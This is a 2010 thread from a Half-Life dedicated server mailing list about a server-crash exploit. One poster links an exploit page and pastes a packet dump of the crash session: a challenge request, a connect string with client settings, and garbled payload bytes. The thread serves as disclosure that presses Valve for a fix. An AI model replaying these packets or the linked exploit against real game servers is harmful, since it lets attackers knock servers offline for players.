Thanks again for posting details about this vulnerability. Perhaps the disclosure will garner a expedited solution from Valve...
-----Original Message----- From: [email protected] [mailto:[email protected]] On Behalf Of Damian Klimek Sent: Thursday, March 04, 2010 1434 To: Half-Life dedicated Linux server mailing list Subject: Re: [hlds_linux] HLDS exploit ? Oh, i mispelled my address should be http://damianklimek.pl/hlds_exploit/ Also - dump of running of vcrash in .pcap [Wireshark format] Interesting in packets : 101,103,104,107,108. 22:29 -> 22:29 22:29 getchallenge valve 22:29 22:29 <- 22:29 22:29 A00000000 729366743 2 22:29 22:29 -> 22:29 22:29 connect 48 729366743 "\prot\3\unique\-1\raw\steam\cdkey\19e5f1e722f4ab6d0d41c82f89c65295" 22:29 "\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\256\cl_lc\1\cl_lw\1\cl_updatera te\20\model\gordon\name 22:29 \uKo8mqLIp6\topcolor\30\rate\25000" 22:29 HjNuHL"K0 22:29 -FRNd}K*KY"*Y,t!F%q_kIhtv2IW|0-rYz#2WL0F$> 22:29 V-9vDCgmY[b2|ebEE*~oC"""}# 22:29 22:29 <- 22:29 22:29 B 616 "83.11.32.104:61402" 1 22:29 22:29 -> 22:29 22:29 1E4>[F?i \D^DTDTDVT 22:29 -> = to server <- = from server Fix for this is very important - anyone minds playing Clanwar while sb run this exploit ? -- Damian 2010/3/4 Saul Rennison <[email protected]>: > It is legal, and thanks for the sploits! LOLOZOLLOZZZ I R CRASHIN UR SERVAZ! > > Thanks, > - Saul. > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds_linux _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds_linux
